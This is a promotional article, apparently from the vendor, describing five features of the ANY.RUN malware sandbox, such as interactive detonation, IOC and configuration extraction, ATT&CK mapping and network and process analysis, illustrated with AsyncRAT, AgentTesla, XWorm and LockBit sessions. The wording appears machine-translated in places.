Dynamic malware analysis is a key part of any threat investigation. This involves running a sample malware in an isolated malware sandbox environment to monitor its behavior and gather actionable metrics. Effective analysis must be quick, thorough, and accurate. These five tools will help you achieve this with ease.
1. Interactivity
Being able to interact with the malware and the system in real-time is a huge advantage when it comes to dynamic analysis. That way, you can not only watch it execute, but also see how it reacts to your inputs and triggers certain behaviors.
It also saves time by allowing samples hosted on file-sharing websites to be downloaded or archived ones opened, which is a common way to deliver payloads to victims.
 |
| The initial phishing email contains a malicious pdf and a password for the archive |
Check it out sandbox session in ANY.RUN sandbox which shows how interactivity is used to analyze the entire attack chain, starting with a phishing email containing a PDF attachment. The link inside the .pdf goes to a file sharing website where the password protected .zip is located.
 |
| The website where the .zip file is located |
The sandbox allows us not only to download the archive, but also to enter the password (which can be found in the email) and extract its contents to launch a malicious payload.
 |
| You can manually enter a password to open protected archives in ANY.RUN |
After running the executable found inside the archive, the sandbox instantly detects that the system has been infected with AsyncRAT, a popular family of malware used by attackers to remotely control victims’ machines and steal sensitive data.
 |
| ANY.RUN gives a convincing verdict on every sample |
It adds the appropriate tags to the interface and generates a threat report.
Analyze files and URLs in ANY.RUN’s private sandbox environment in real time.
Get a 14-day free trial of Sandbox to test its capabilities.
2. Extraction of IOC
Collecting relevant indicators of trade-off (IOC) is one of the main tasks of dynamic analysis. Detonating the malware in a live environment causes it to reveal C2’s server addresses, encryption keys, and other parameters that enable it to function and communicate with attackers.
Although such data is often protected and hidden by malware developers, some sandboxing solutions are equipped with advanced IOC collection capabilities, making it easy to identify malicious infrastructure.
 |
| As part of each analysis session in ANY.RUN, you get a full IOC report |
With ANY.RUN, you can quickly collect a variety of indicators, including file hashes, malicious URLs, C2 connections, DNS queries, and more.
 |
| Example AsyncRAT configuration sandboxed by ANY.RUN |
The ANY.RUN sandbox goes even further by not only providing a list of relevant indicators collected during a scan session, but also extracting configurations for dozens of popular malware families. See an example malware configuration below sandbox session.
These configurations are the most reliable source of actionable IOCs that you can use without hesitation to improve detection systems and improve the effectiveness of your overall security measures.
3. MITER ATT&CK Mapping
Preventing potential attacks on your infrastructure isn’t just about proactively looking for IOCs used by attackers. A longer method is to understand the tactics, techniques and procedures (TTP) used by malware targeting your industry.
The MITER ATT&CK framework helps you map these TTPs so you can see what the malware is doing and how it fits into the larger threat picture. By understanding TTP, you can build stronger defenses tailored to your organization and stop attackers at their doorstep.
 |
| TTP of the AgentTesla malware sample analyzed in the ANY.RUN sandbox |
See the following analysis Tesla agent. The service logs all the main TTPs used in the attack and provides a detailed description for each one.
All that’s left to do is take this important threat information and use it to strengthen your security mechanisms.
4. Analysis of network traffic
Dynamic malware analysis also requires a thorough examination of the network traffic generated by the malware.
Analysis of HTTP requests, connections, and DNS queries can provide insight into the malware’s communication with external servers, the type of data being exchanged, and any malicious activity.
 |
| Analyze network traffic in the ANY.RUN sandbox |
ANY.RUN sandbox captures all network traffic and allows you to view received and sent packets in HEX and text formats.
 |
| The Suricata rule that defines AgentTesla’s data-stealing activity |
Beyond simply logging traffic, it’s critical that a sandbox automatically detects malicious activity. To do this, ANY.RUN uses Suricata IDS rules that scan network activity and report threats.
You can also export the data in PCAP format for detailed analysis using tools like Wireshark.
Try ANY.RUN advanced network traffic analysis with a 14-day free trial.
5. Advanced process analysis
To understand the malware’s execution progress and its impact on the system, you need to have access to detailed information about the processes it spawns. To help you with this, the sandbox you choose should provide advanced process analysis that covers several areas.
 |
| A visual graph in the ANY.RUN sandbox showing the execution of the AsynRAT malware |
For example, visualization of the process tree in ANY.RUN sandbox makes it easier to trace the sequence of creation and termination of processes and identifies key processes that are critical to the operation of the malware.
 |
| ANY.RUN sandbox reports files with untrusted certificates |
You should also be able to verify the authenticity of the process by looking at the details of the certificate, including the issuer, status, and expiration date.
 |
| XWorm malware process dump available for download in ANY.RUN |
Another useful feature is process dumps, which can contain vital information such as encryption keys used by malware. An efficient sandbox will allow you to easily download these dumps for further forensic analysis.
 |
| ANY.RUN displays a detailed breakdown of PowerShell, JavaScript, and VBScript scripts |
One of the latest trends in cyberattacks is the use of fileless malware that only runs in memory. To catch it, you need to have access to the scripts and commands that are executed during the infection process.
 |
| Files encrypted by LockBit ransomware during analysis in the ANY.RUN sandbox |
Tracking file creation, modification, and deletion events is another important part of any malware investigation. This can help you detect when a process tries to delete or modify files in sensitive areas such as system directories or startup folders.
 |
| An example of XWorm using the Run registry key to achieve persistence |
Monitoring registry changes made in the process is critical to understanding malware persistence mechanisms. The Windows registry is a common target for malware because it can be used to run malicious code at startup or change system behavior.
Analyze malware and phishing threats in the ANY.RUN sandbox
ANY.RUN provides a cloud-based malware and phishing analysis sandbox that provides fast and accurate results to optimize your investigations. Thanks to the interactivity, you can freely interact with the files and URLs you send, as well as with the system to study the threat in depth.
You can integrate ANY.RUN’s advanced sandbox with features like Windows and Linux virtual machines, private mode, and teamwork in your organization.
Leave a trial request check the ANY.RUN sandbox.
